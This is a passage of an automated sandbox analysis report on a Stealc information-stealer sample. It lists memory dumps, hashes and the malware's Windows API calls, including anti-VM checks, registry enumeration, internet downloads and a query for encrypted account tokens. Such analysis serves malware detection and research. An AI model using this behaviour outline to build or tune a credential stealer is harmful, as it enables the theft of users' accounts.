                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                                                                                                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                            • API String ID: 1440504306-1079375795
                                                                                                                                                                            • Opcode ID: a591192ca9d3836a554972a5500f4fe45fc4737e1f9495fd5f96d8f77445e6de
                                                                                                                                                                            • Instruction ID: b5e20980da08a92d857e63bff4df80a062e6addc460d786a05629deac7820924
                                                                                                                                                                            • Opcode Fuzzy Hash: a591192ca9d3836a554972a5500f4fe45fc4737e1f9495fd5f96d8f77445e6de
                                                                                                                                                                            • Instruction Fuzzy Hash: 01B11271950108EBEF05FBA0DD9AEEE7378AF54300F40456AF506A6191EF3C6A49CB72
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00774FCA
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00774FD1
                                                                                                                                                                            • InternetOpenA.WININET(00790DDF,00000000,00000000,00000000,00000000), ref: 00774FEA
                                                                                                                                                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00775011
                                                                                                                                                                            • InternetReadFile.WININET(00785EDB,?,00000400,00000000), ref: 00775041
                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 0077508A
                                                                                                                                                                            • InternetCloseHandle.WININET(00785EDB), ref: 007750B9
                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 007750C6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1008454911-0
                                                                                                                                                                            • Opcode ID: f6f70fed661ead36abc1df6e6bf9aa5372dd7e7f08bccdaa4bf3bc876d163d15
                                                                                                                                                                            • Instruction ID: c953efe399eee535d2ef1da33b843862ec7609296ad2825a2586c91cacc243d4
                                                                                                                                                                            • Opcode Fuzzy Hash: f6f70fed661ead36abc1df6e6bf9aa5372dd7e7f08bccdaa4bf3bc876d163d15
                                                                                                                                                                            • Instruction Fuzzy Hash: 703128B4A44218ABDB20CF54DD85BDCB7B4FB48704F1081D9F609A7280DBB46AC5DF99
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1BA0), ref: 007898A1
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1CA8), ref: 007898BA
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1BD0), ref: 007898D2
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1C60), ref: 007898EA
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1D38), ref: 00789903
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1600), ref: 0078991B
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CEACC8), ref: 00789933
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CEAF08), ref: 0078994C
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1BE8), ref: 00789964
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1C30), ref: 0078997C
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1CC0), ref: 00789995
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1A80), ref: 007899AD
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CEAE68), ref: 007899C5
                                                                                                                                                                              • Part of subcall function 00789860: GetProcAddress.KERNEL32(77190000,00CF1CF0), ref: 007899DE
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 007711D0: ExitProcess.KERNEL32 ref: 00771211
                                                                                                                                                                              • Part of subcall function 00771160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00786A17,00790AEF), ref: 0077116A
                                                                                                                                                                              • Part of subcall function 00771160: ExitProcess.KERNEL32 ref: 0077117E
                                                                                                                                                                              • Part of subcall function 00771110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00786A1C), ref: 0077112B
                                                                                                                                                                              • Part of subcall function 00771110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00786A1C), ref: 00771132
                                                                                                                                                                              • Part of subcall function 00771110: ExitProcess.KERNEL32 ref: 00771143
                                                                                                                                                                              • Part of subcall function 00771220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0077123E
                                                                                                                                                                              • Part of subcall function 00771220: __aulldiv.LIBCMT ref: 00771258
                                                                                                                                                                              • Part of subcall function 00771220: __aulldiv.LIBCMT ref: 00771266
                                                                                                                                                                              • Part of subcall function 00771220: ExitProcess.KERNEL32 ref: 00771294
                                                                                                                                                                              • Part of subcall function 00786770: GetUserDefaultLangID.KERNEL32(?,?,00786A26,00790AEF), ref: 00786774
                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32 ref: 00786A26
                                                                                                                                                                              • Part of subcall function 00771190: ExitProcess.KERNEL32 ref: 007711C6
                                                                                                                                                                              • Part of subcall function 00787850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007711B7), ref: 00787880
                                                                                                                                                                              • Part of subcall function 00787850: HeapAlloc.KERNEL32(00000000,?,?,?,007711B7), ref: 00787887
                                                                                                                                                                              • Part of subcall function 00787850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0078789F
                                                                                                                                                                              • Part of subcall function 007878E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00786A2B), ref: 00787910
                                                                                                                                                                              • Part of subcall function 007878E0: HeapAlloc.KERNEL32(00000000,?,?,?,00786A2B), ref: 00787917
                                                                                                                                                                              • Part of subcall function 007878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0078792F
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CF1620,?,0079110C,?,00000000,?,00791110,?,00000000,00790AEF), ref: 00786ACA
                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00786AE8
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00786AF9
                                                                                                                                                                            • Sleep.KERNEL32(00001770), ref: 00786B04
                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,?,00CF1620,?,0079110C,?,00000000,?,00791110,?,00000000,00790AEF), ref: 00786B1A
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00786B22
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3511611419-0
                                                                                                                                                                            • Opcode ID: 131504898ecc1e088849ad8fb6551cb04f12ece03230755857d701cbec1fe6d9
                                                                                                                                                                            • Instruction ID: 24d9fe55fa50293eeb556da589d1a44ec2a988ce7e11c609e10ebdc1352fbc2c
                                                                                                                                                                            • Opcode Fuzzy Hash: 131504898ecc1e088849ad8fb6551cb04f12ece03230755857d701cbec1fe6d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 02312A71994208FAEB05FBE0DC5EBEE7778AF04340F508529F212A6192DF7C6905D7A2
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00788426
                                                                                                                                                                            • wsprintfA.USER32 ref: 00788459
                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0078847B
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0078848C
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00788499
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00CFF888,00000000,000F003F,?,00000400), ref: 007884EC
                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00788501
                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00CFF948,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00790B34), ref: 00788599
                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 00788608
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0078861A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                            • String ID: %s\%s
                                                                                                                                                                            • API String ID: 3896182533-4073750446
                                                                                                                                                                            • Opcode ID: 4209f837a2976c9ca1174a9808895b0821d690e342a9e256db2b7fb2679ca1cd
                                                                                                                                                                            • Instruction ID: 6416b2f3e6c5539c366a8e975dd12da7ffedf0fd90d62958629b1a938805f875
                                                                                                                                                                            • Opcode Fuzzy Hash: 4209f837a2976c9ca1174a9808895b0821d690e342a9e256db2b7fb2679ca1cd
                                                                                                                                                                            • Instruction Fuzzy Hash: A92139B1A54218ABDB64DB54DC85FE9B3B8FB48710F00C2D8E609A6140DF75AA81CFE5
                                                                                                                                                                            APIs
                                                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007747EA
                                                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774801
                                                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00774818
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00774839
                                                                                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00774849
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ??2@$CrackInternetlstrlen
                                                                                                                                                                            • String ID: <
                                                                                                                                                                            • API String ID: 1683549937-4251816714
                                                                                                                                                                            • Opcode ID: ad58256cef64b92ed31f76b56dd340a43218585675805fc58c5cd6d267842c84
                                                                                                                                                                            • Instruction ID: b7c227214048d9756ea33c2e9c5375d6e4dac98199556f4b892a391a1499a689
                                                                                                                                                                            • Opcode Fuzzy Hash: ad58256cef64b92ed31f76b56dd340a43218585675805fc58c5cd6d267842c84
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A21E8B1D00209ABDF14EFA4E949ADD7B74FB45320F208225F925A72D0EB746A15CF92
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007876A4
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 007876AB
                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00CF8288,00000000,00020119,00000000), ref: 007876DD
                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00CFF798,00000000,00000000,?,000000FF), ref: 007876FE
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00787708
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                            • String ID: Windows 11
                                                                                                                                                                            • API String ID: 3466090806-2517555085
                                                                                                                                                                            • Opcode ID: f3c1c8892f0821982c9e23d570d5c97c3c33c215ed3297f075375657e9b559dd
